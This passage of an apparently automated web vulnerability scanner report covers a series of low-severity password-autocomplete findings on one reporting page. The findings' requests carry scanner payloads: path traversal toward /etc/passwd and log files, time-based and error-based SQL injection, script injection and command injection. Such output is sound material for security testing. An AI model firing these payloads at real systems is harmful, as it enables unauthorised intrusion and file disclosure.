Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../../etc/passwd%00" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.68. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%27))%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e3042a9b6d0213f1e43
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:09 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:09 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27))%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.69. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=(select+sleep(25))a--+1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:04 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=(select+sleep(25))a--+1" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.70. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=../../../../../../../../../../proc/self/fd/2 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../proc/self/fd/2" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.71. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=-1+OR+1%3d1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-1+OR+1%3d1" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.72. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%22+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)+or+%221%22%3D%22 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)+or+%221%22%3D%22" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.73. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=../../../../../../../../../../../etc/passwd HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../../etc/passwd" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.74. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/?nsextt=%22%3E%3Cnet%20sparker=netsparker(0x000029)%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:46 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:46 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:46 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=%22%3e%3cnet%20sparker=netsparker(0x000029)%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.75. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/?nsextt=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x000007%2529%253C%252Fscript%253E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:37 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:39 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:39 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:37 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=%2527%2522--%253e%253c%252fstyle%253e%253c%252fscript%253e%253cscript%253enetsparker%25280x000007%2529%253c%252fscript%253e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.76. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=SELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:08 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=SELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.77. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=1NS_NO HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1NS_NO" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.78. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=//www.netsparker.com? HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=//www.netsparker.com?" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.79. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%27%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:38 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:38 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27%26%20ping%20-n%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.80. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=SELECT%20SLEEP(25)--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=SELECT%20SLEEP(25)--+" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.81. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=-111%20OR%201=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)%20 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:05 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-111%20OR%201=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)%20" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.82. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=../../../../../../../../../../boot.ini%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../boot.ini%00" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.83. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000003)%3C/script%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000003)%3C/script%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.84. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%27%26expr%20268409241%20-%202%20%26%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27%26expr%20268409241%20-%202%20%26%27" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.85. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=../../../../../../../../../../var/log/apache2/error.log HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
